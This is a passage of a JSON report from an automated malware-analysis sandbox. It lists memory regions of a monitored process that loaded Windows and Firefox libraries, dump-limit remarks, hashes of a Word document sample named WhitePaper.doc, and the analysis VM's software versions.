"pagefile_0x0000000000bc0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 12320768, "timestamp": "00:01:49.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 278528, "start_va": 19136512, "type": "region", "version": 1 }, "end_va": 19415039, "entry_point": 0, "filename": null, "id": "region_1803", "name": "pagefile_0x0000000001240000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 19136512, "timestamp": "00:01:49.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1995767808, "type": "region", "version": 1 }, "end_va": 1997062143, "entry_point": 1995767808, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1804", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1995767808, "timestamp": "00:01:49.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 1998127104, "type": "region", "version": 1 }, "end_va": 1998131199, "entry_point": 1998127104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1805", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 1998127104, "timestamp": "00:01:49.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1806", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:01:49.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147323904, "type": "region", "version": 1 }, "end_va": 2147327999, "entry_point": 0, "filename": null, "id": "region_1807", "name": "private_0x000000007ffd9000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147323904, "timestamp": "00:01:49.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1808", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:01:49.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 14614528, "type": "region", "version": 1 }, "end_va": 14876671, "entry_point": 0, "filename": null, "id": "region_1809", "name": "private_0x0000000000df0000", "norm_filename": null, "region_type": "private_memory", "start_va": 14614528, "timestamp": "00:01:49.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1965424640, "type": "region", "version": 1 }, "end_va": 1965727743, "entry_point": 1965424640, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1810", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1965424640, "timestamp": "00:01:49.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1992359936, "type": "region", "version": 1 }, "end_va": 1993228287, "entry_point": 1992359936, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1811", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1992359936, "timestamp": "00:01:49.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1812", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:49.199", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1813", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:01:49.199", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 778240, "start_va": 1912602624, "type": "region", "version": 1 }, "end_va": 1913380863, "entry_point": 1912602624, "filename": "\\Program Files\\Mozilla Firefox\\msvcr100.dll", "id": "region_1814", "name": "msvcr100.dll", "norm_filename": "c:\\program files\\mozilla firefox\\msvcr100.dll", "region_type": "memory_mapped_file", "start_va": 1912602624, "timestamp": "00:01:49.199", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1984299008, "type": "region", "version": 1 }, "end_va": 1984339967, "entry_point": 1984299008, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1815", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1984299008, "timestamp": "00:01:49.209", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1985806336, "type": "region", "version": 1 }, "end_va": 1986125823, "entry_point": 1985806336, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1816", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1985806336, "timestamp": "00:01:49.209", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1986134016, "type": "region", "version": 1 }, "end_va": 1986957311, "entry_point": 1986134016, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1817", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1986134016, "timestamp": "00:01:49.209", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1988427776, "type": "region", "version": 1 }, "end_va": 1989070847, "entry_point": 1988427776, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1818", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1988427776, "timestamp": "00:01:49.209", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1994653696, "type": "region", "version": 1 }, "end_va": 1995358207, "entry_point": 1994653696, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1819", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1994653696, "timestamp": "00:01:49.209", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1820", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:01:49.209", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 13434880, "type": "region", "version": 1 }, "end_va": 14254079, "entry_point": 0, "filename": null, "id": "region_1821", "name": "pagefile_0x0000000000cd0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 13434880, "timestamp": "00:01:49.213", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 14483456, "type": "region", "version": 1 }, "end_va": 14548991, "entry_point": 0, "filename": null, "id": "region_1822", "name": "private_0x0000000000dd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 14483456, "timestamp": "00:01:49.213", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 1984364544, "type": "region", "version": 1 }, "end_va": 1984491519, "entry_point": 1984364544, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1823", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1984364544, "timestamp": "00:01:49.213", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1992343551, "entry_point": 1991507968, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1824", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:01:49.213", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1825", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:49.255", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 790527, "entry_point": 0, "filename": null, "id": "region_1826", "name": "private_0x00000000000c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 786432, "timestamp": "00:01:49.255", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 14876672, "type": "region", "version": 1 }, "end_va": 15929343, "entry_point": 0, "filename": null, "id": "region_1827", "name": "pagefile_0x0000000000e30000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 14876672, "timestamp": "00:01:49.255", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 15990784, "type": "region", "version": 1 }, "end_va": 17285119, "entry_point": 15990784, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1828", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 15990784, "timestamp": "00:01:49.255", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 18022400, "type": "region", "version": 1 }, "end_va": 18087935, "entry_point": 0, "filename": null, "id": "region_1829", "name": "private_0x0000000001130000", "norm_filename": null, "region_type": "private_memory", "start_va": 18022400, "timestamp": "00:01:49.256", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 19464192, "type": "region", "version": 1 }, "end_va": 32047103, "entry_point": 0, "filename": null, "id": "region_1830", "name": "pagefile_0x0000000001290000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 19464192, "timestamp": "00:01:49.256", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1967259648, "type": "region", "version": 1 }, "end_va": 1967919103, "entry_point": 1967259648, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1831", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1967259648, "timestamp": "00:01:49.267", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1997078528, "type": "region", "version": 1 }, "end_va": 1997103103, "entry_point": 1997078528, "filename": "\\Windows\\System32\\nsi.dll", "id": "region_1832", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1997078528, "timestamp": "00:01:49.267", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997340672, "type": "region", "version": 1 }, "end_va": 1997557759, "entry_point": 1997340672, "filename": "\\Windows\\System32\\ws2_32.dll", "id": "region_1833", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\system32\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997340672, "timestamp": "00:01:49.268", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 868351, "entry_point": 0, "filename": null, "id": "region_1834", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:01:49.314", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1967980544, "type": "region", "version": 1 }, "end_va": 1968635903, "entry_point": 1967980544, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1835", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1967980544, "timestamp": "00:01:49.314", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989083136, "type": "region", "version": 1 }, "end_va": 1989185535, "entry_point": 1989083136, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1836", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989083136, "timestamp": "00:01:49.314", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1789952, "start_va": 1653866496, "type": "region", "version": 1 }, "end_va": 1655656447, "entry_point": 1653866496, "filename": "\\Program Files\\Mozilla Firefox\\nss3.dll", "id": "region_1837", "name": "nss3.dll", "norm_filename": "c:\\program files\\mozilla firefox\\nss3.dll", "region_type": "memory_mapped_file", "start_va": 1653866496, "timestamp": "00:01:49.400", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 204800, "start_va": 1850802176, "type": "region", "version": 1 }, "end_va": 1851006975, "entry_point": 1850802176, "filename": "\\Windows\\System32\\winmm.dll", "id": "region_1838", "name": "winmm.dll", "norm_filename": "c:\\windows\\system32\\winmm.dll", "region_type": "memory_mapped_file", "start_va": 1850802176, "timestamp": "00:01:49.400", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 430080, "start_va": 1913454592, "type": "region", "version": 1 }, "end_va": 1913884671, "entry_point": 1913454592, "filename": "\\Program Files\\Mozilla Firefox\\msvcp100.dll", "id": "region_1839", "name": "msvcp100.dll", "norm_filename": "c:\\program files\\mozilla firefox\\msvcp100.dll", "region_type": "memory_mapped_file", "start_va": 1913454592, "timestamp": "00:01:49.400", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 139264, "start_va": 1913913344, "type": "region", "version": 1 }, "end_va": 1914052607, "entry_point": 1913913344, "filename": "\\Program Files\\Mozilla Firefox\\mozglue.dll", "id": "region_1840", "name": "mozglue.dll", "norm_filename": "c:\\program files\\mozilla firefox\\mozglue.dll", "region_type": "memory_mapped_file", "start_va": 1913913344, "timestamp": "00:01:49.414", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1914109952, "type": "region", "version": 1 }, "end_va": 1914138623, "entry_point": 1914109952, "filename": "\\Windows\\System32\\wsock32.dll", "id": "region_1841", "name": "wsock32.dll", "norm_filename": "c:\\windows\\system32\\wsock32.dll", "region_type": "memory_mapped_file", "start_va": 1914109952, "timestamp": "00:01:49.415", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 18087936, "type": "region", "version": 1 }, "end_va": 19136511, "entry_point": 0, "filename": null, "id": "region_1842", "name": "private_0x0000000001140000", "norm_filename": null, "region_type": "private_memory", "start_va": 18087936, "timestamp": "00:01:49.523", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1964048384, "type": "region", "version": 1 }, "end_va": 1964097535, "entry_point": 1964048384, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_1843", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1964048384, "timestamp": "00:01:49.523", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1964113920, "type": "region", "version": 1 }, "end_va": 1965281279, "entry_point": 1964113920, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_1844", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1964113920, "timestamp": "00:01:49.523", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 32505856, "type": "region", "version": 1 }, "end_va": 33554431, "entry_point": 0, "filename": null, "id": "region_1845", "name": "private_0x0000000001f00000", "norm_filename": null, "region_type": "private_memory", "start_va": 32505856, "timestamp": "00:01:49.567", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 33554432, "type": "region", "version": 1 }, "end_va": 36499455, "entry_point": 33554432, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1846", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 33554432, "timestamp": "00:01:49.567", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 1864302592, "type": "region", "version": 1 }, "end_va": 1864462335, "entry_point": 1864302592, "filename": "\\Program Files\\Mozilla Firefox\\softokn3.dll", "id": "region_1847", "name": "softokn3.dll", "norm_filename": "c:\\program files\\mozilla firefox\\softokn3.dll", "region_type": "memory_mapped_file", "start_va": 1864302592, "timestamp": "00:01:49.567", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1912471552, "type": "region", "version": 1 }, "end_va": 1912565759, "entry_point": 1912471552, "filename": "\\Program Files\\Mozilla Firefox\\nssdbm3.dll", "id": "region_1848", "name": "nssdbm3.dll", "norm_filename": "c:\\program files\\mozilla firefox\\nssdbm3.dll", "region_type": "memory_mapped_file", "start_va": 1912471552, "timestamp": "00:01:49.569", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 14286848, "type": "region", "version": 1 }, "end_va": 14315519, "entry_point": 0, "filename": null, "id": "region_1849", "name": "pagefile_0x0000000000da0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 14286848, "timestamp": "00:01:49.576", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 14352384, "type": "region", "version": 1 }, "end_va": 14360575, "entry_point": 0, "filename": null, "id": "region_1850", "name": "pagefile_0x0000000000db0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 14352384, "timestamp": "00:01:49.576", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 36503552, "type": "region", "version": 1 }, "end_va": 40644607, "entry_point": 0, "filename": null, "id": "region_1851", "name": "pagefile_0x00000000022d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 36503552, "timestamp": "00:01:49.576", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 323584, "start_va": 1863254016, "type": "region", "version": 1 }, "end_va": 1863577599, "entry_point": 1863254016, "filename": "\\Program Files\\Mozilla Firefox\\freebl3.dll", "id": "region_1852", "name": "freebl3.dll", "norm_filename": "c:\\program files\\mozilla firefox\\freebl3.dll", "region_type": "memory_mapped_file", "start_va": 1863254016, "timestamp": "00:01:49.577", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1971388416, "type": "region", "version": 1 }, "end_va": 1984274431, "entry_point": 1971388416, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_1853", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1971388416, "timestamp": "00:01:49.577", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1997668352, "type": "region", "version": 1 }, "end_va": 1998024703, "entry_point": 1997668352, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_1854", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1997668352, "timestamp": "00:01:49.577", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1962868736, "type": "region", "version": 1 }, "end_va": 1962917887, "entry_point": 1962868736, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_1855", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1962868736, "timestamp": "00:01:49.579", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 } ], "remarks": { "critical": [], "non_critical": [ { "comment": "The dump total size limit was reached during the analysis. Some memory dump may be missing in the reports. You can increase the limit in the configuration.", "id": 512, "type": "remark", "version": 1 }, { "comment": "The maximum number of dumps was reached during the analysis. Some memory dumps may be missing in the reports. You can increase the limit in the configuration.", "id": 2048, "type": "remark", "version": 1 } ], "type": "remarks", "version": 1 }, "sample_details": { "filename": "WhitePaper.doc", "id": 20883, "md5_hash": "30926dda00ebf82f1355217d4285980f", "sample_type": "word_document", "sha1_hash": "d1b8a2414232fbeb997dcb4fdc1d9969137a5445", "sha256_hash": "1c0a1a7c695d5e1a7497b7fa4f75cf83f12265eaca2297b3d72461d110fcb079", "size": 8685, "type": "sample_details", "version": 1 }, "screenshots": [ { "screenshot_archive_path": "screenshots/screenshot_0.png", "size": 251200, "thumbnail_archive_path": "screenshots/thumbnail_0.png", "timestamp": "00:00:00.000", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_22149.png", "size": 255440, "thumbnail_archive_path": "screenshots/thumbnail_22149.png", "timestamp": "00:00:22.149", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_30321.png", "size": 255055, "thumbnail_archive_path": "screenshots/thumbnail_30321.png", "timestamp": "00:00:30.321", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_32631.png", "size": 57675, "thumbnail_archive_path": "screenshots/thumbnail_32631.png", "timestamp": "00:00:32.631", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_38147.png", "size": 57613, "thumbnail_archive_path": "screenshots/thumbnail_38147.png", "timestamp": "00:00:38.147", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_40151.png", "size": 56726, "thumbnail_archive_path": "screenshots/thumbnail_40151.png", "timestamp": "00:00:40.151", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_52355.png", "size": 61239, "thumbnail_archive_path": "screenshots/thumbnail_52355.png", "timestamp": "00:00:52.355", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_113897.png", "size": 56881, "thumbnail_archive_path": "screenshots/thumbnail_113897.png", "timestamp": "00:01:53.897", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_115156.png", "size": 57149, "thumbnail_archive_path": "screenshots/thumbnail_115156.png", "timestamp": "00:01:55.156", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_116164.png", "size": 47911, "thumbnail_archive_path": "screenshots/thumbnail_116164.png", "timestamp": "00:01:56.164", "type": "screenshot", "version": 1 } ], "type": "summary", "version": 1, "vm_and_analyzer_details": { "adobe_acrobat_reader_version": "not_installed", "analyzer_build_date": "2017-12-15 17:49", "analyzer_version": "2.2.0", "chrome_version": "58.0.3029.110", "firefox_version": "25.0", "flash_version": "10.3.183.90", "internet_explorer_version": "8.0.7601.17514", "java_version": "7.0.600", "microsoft_excel_version": "15.0.4569.1504", "microsoft_office_version": "15.0.4569.1504", "microsoft_power_point_version": "15.0.4569.1504", "microsoft_project_version": "15.0.4569.1504", "microsoft_publisher_version": "15.0.4569.1504", "microsoft_visio_version": "15.0.4569.1504", 